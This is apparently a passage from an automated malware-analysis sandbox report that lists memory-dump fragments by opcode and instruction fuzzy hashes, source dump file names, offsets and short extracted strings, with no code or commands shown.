                    • Instruction ID: a0c1d6708ccf5f26d8a0e720f7cece0c9df6e56d67716d834885108cb47b5774
                    • Opcode Fuzzy Hash: c23fbeee6fe208c73a7fbd9e066ad19049a1ac78d92db90bd4c388f568b0aa26
                    • Instruction Fuzzy Hash: 26E0D8302082018FC704FF24E4019C57BE19F81208B148CAED44D8F632D6A29C4A8B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4fd7f448e1625028e59e8b11daba330aada54c8f83241893496c1c5819ee68dc
                    • Instruction ID: 8d8aba577015bda622e19384149d61d76a0bd26854fda24b38cdfeb514a004a5
                    • Opcode Fuzzy Hash: 4fd7f448e1625028e59e8b11daba330aada54c8f83241893496c1c5819ee68dc
                    • Instruction Fuzzy Hash: 31E0CD75B001189FC750EA14A8C07DEF366FBC6210F104156C14697360DF711D914F91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.888013537.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 69efd5f241a2754f7573575e46f9ddbb53f03cfdcb0ef3f4410662fb0bc14c81
                    • Instruction ID: f5427d73d4ddfbfa8cf804c610fdc028b082324f5d1e170599d6806e613ca352
                    • Opcode Fuzzy Hash: 69efd5f241a2754f7573575e46f9ddbb53f03cfdcb0ef3f4410662fb0bc14c81
                    • Instruction Fuzzy Hash: 42D05B32A0021A6B5B159A9594154DE7FBDEB84271F10406FD405D2605EF3159008E80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.888013537.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a10ca7ba81cf2d3673e4997c410c6317d43124a2c76173ea96daa900e59bd5ec
                    • Instruction ID: 7d6726e8c1daa941f520ce72f59bc5908ba20ecce68a1e40e787546c0f700f5b
                    • Opcode Fuzzy Hash: a10ca7ba81cf2d3673e4997c410c6317d43124a2c76173ea96daa900e59bd5ec
                    • Instruction Fuzzy Hash: 07D01770A0020CEFDB40DFB4D80469EBBEADB84208F1089A9980DD7740EA356E004BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ea2347fb1968e4fc7fe3ca94a67dc58f630655c5575efd41f04ba3dc4a52d0e6
                    • Instruction ID: 44ae86e1b5b450210f64579790739dab0413c930d53bbe502c741e930b7842d7
                    • Opcode Fuzzy Hash: ea2347fb1968e4fc7fe3ca94a67dc58f630655c5575efd41f04ba3dc4a52d0e6
                    • Instruction Fuzzy Hash: 27D0A7111093C41EDF021370283D6557F648B43108F1848EFD4458FA93D41A2507D311
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9474a1f9f431cd8e4610003bc22393b39404796f9428a9cf9fd8f8f7c129fa38
                    • Instruction ID: 0e6cb08c1e631e609565468861b41752f99005bc152465cbf647cbaf21ac43bb
                    • Opcode Fuzzy Hash: 9474a1f9f431cd8e4610003bc22393b39404796f9428a9cf9fd8f8f7c129fa38
                    • Instruction Fuzzy Hash: EED0A9312002249BC3052AA4E40D89ABBA9EB49232700803EEC0383300CA72AC50CB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d3a988a58b309c6a15177196f947a6fe9fcf3bb855584da4c38b1ad93aea3956
                    • Instruction ID: 6d6896e58844722ed3c6ebeb802b790a2d098b7358a3c5ff109ab0db71ba8faa
                    • Opcode Fuzzy Hash: d3a988a58b309c6a15177196f947a6fe9fcf3bb855584da4c38b1ad93aea3956
                    • Instruction Fuzzy Hash: A0D01C36E01009EFCB05CF99FA89ADCF732FB88316F148026E902A25508B312A61CF10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.888013537.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1b531b5e272d6bffe5e3b2924bab526dcdb605ad1895d3a73f3f127210f78d19
                    • Instruction ID: 1817d7687fd3ce398f518ade325d3b8e55607f479350138301635f9a2947c528
                    • Opcode Fuzzy Hash: 1b531b5e272d6bffe5e3b2924bab526dcdb605ad1895d3a73f3f127210f78d19
                    • Instruction Fuzzy Hash: 39C012313140344BCA04AB5CE44495937DD9B49768B0200A6F509CB361CA92FC4147E5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8ccf89da46fd9605434cae29f31dd1d469528e6c8a517ea7adf6bc7ea2b94955
                    • Instruction ID: 753af025c040330e7f60acf3266ce53177131d6285c605c42af3e6074f8ecd0c
                    • Opcode Fuzzy Hash: 8ccf89da46fd9605434cae29f31dd1d469528e6c8a517ea7adf6bc7ea2b94955
                    • Instruction Fuzzy Hash: E0C02B2024038C1FEB4033B0380D72536AD0781308F5000B6AC0A4AB82C91514409200
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.888013537.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 561c29dc5bf59b12d4cfaba35c244fa5356dd9923d1fa507cc94b9ed97130c43
                    • Instruction ID: a61375a723f88f4be21a0dcf3b4619f5fd36a74d948d88317e2fdf20467ad48d
                    • Opcode Fuzzy Hash: 561c29dc5bf59b12d4cfaba35c244fa5356dd9923d1fa507cc94b9ed97130c43
                    • Instruction Fuzzy Hash: 16C0121008E3C08FCB13533885186007F200F83210F0A00CAC0C4CE0A3C6994824C767
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.888013537.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: D!m$T:m$\m$t%m
                    • API String ID: 0-2608260667
                    • Opcode ID: a63cf690677596096bc20f02a3ce675b4d2569351b5e02098903fa469be4aa4b
                    • Instruction ID: 9e40379e306be08c927aa33a0c7e9fe052e9323eb024dcb60c047680341face4
                    • Opcode Fuzzy Hash: a63cf690677596096bc20f02a3ce675b4d2569351b5e02098903fa469be4aa4b
                    • Instruction Fuzzy Hash: 41A270347002485FEF24AB719C50BBE77BBABC5708F148069A6069F3E8DFB15C415BA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.888013537.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: D!m$T:m$\m$t%m
                    • API String ID: 0-2608260667
                    • Opcode ID: bd4406981478cf54a1f98d114be603b7fbaa625bd3d77f58bc41f06d87a2ff17
                    • Instruction ID: abbf52193b98cf4ca0daf4d46bbfd2d9d5aac61127baa9af7ccc95f6998440ea
                    • Opcode Fuzzy Hash: bd4406981478cf54a1f98d114be603b7fbaa625bd3d77f58bc41f06d87a2ff17
                    • Instruction Fuzzy Hash: DFA260747002485FEF24AB719C50BBE77BBABC5708F148069A6069F3E8DFB15C415BA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: <m$p\}l$p\}l
                    • API String ID: 0-1355642730
                    • Opcode ID: 9785b7bacb2d09365053a749b62f473ac04f9fac4223efeb0c932211aa5ab644
                    • Instruction ID: 223f35c470795daec5664ed4a6d51a22d12f84b562f928dca0d12c8412d76a75
                    • Opcode Fuzzy Hash: 9785b7bacb2d09365053a749b62f473ac04f9fac4223efeb0c932211aa5ab644
                    • Instruction Fuzzy Hash: C0923174B002198FCB54DF68C894AAEB7F6BF88214F1185A9D509EB365DB30ED81CF61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.887921924.0000000008240000.00000040.00000800.00020000.00000000.sdmp, Offset: 08240000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: \m$\m$\m$\m$\m
                    • API String ID: 0-1145036314
                    • Opcode ID: b50359be845c0001bf6cbc584c0d63876c3f219c57cb665d20a9536e1bdd000f
                    • Instruction ID: 5d144e06f5b7b9d77e52455387306e42a71d242c9694d54c43aa363e6b053e79
                    • Opcode Fuzzy Hash: b50359be845c0001bf6cbc584c0d63876c3f219c57cb665d20a9536e1bdd000f
                    • Instruction Fuzzy Hash: B6E12735715342CFCB19AF68C4107AAB7E6AFC5216F2885BED845CB252DB31C842C7B6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.887921924.0000000008240000.00000040.00000800.00020000.00000000.sdmp, Offset: 08240000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: \m$\m$\m$\m
                    • API String ID: 0-1930561502
                    • Opcode ID: 14937e645985329f37a88ccb897d87371820d3e3302a74c8f4d9457b89697834
                    • Instruction ID: 3df8db780dbea56c034cab04f45af81f624f4262e177df17be270c4dd484e700
                    • Opcode Fuzzy Hash: 14937e645985329f37a88ccb897d87371820d3e3302a74c8f4d9457b89697834
                    • Instruction Fuzzy Hash: B6214E35315386DFC7199F69C8413A577E56F82102B1991EAD804CF296CB31CC42C776
                    Uniqueness

                    Uniqueness Score: -1.00%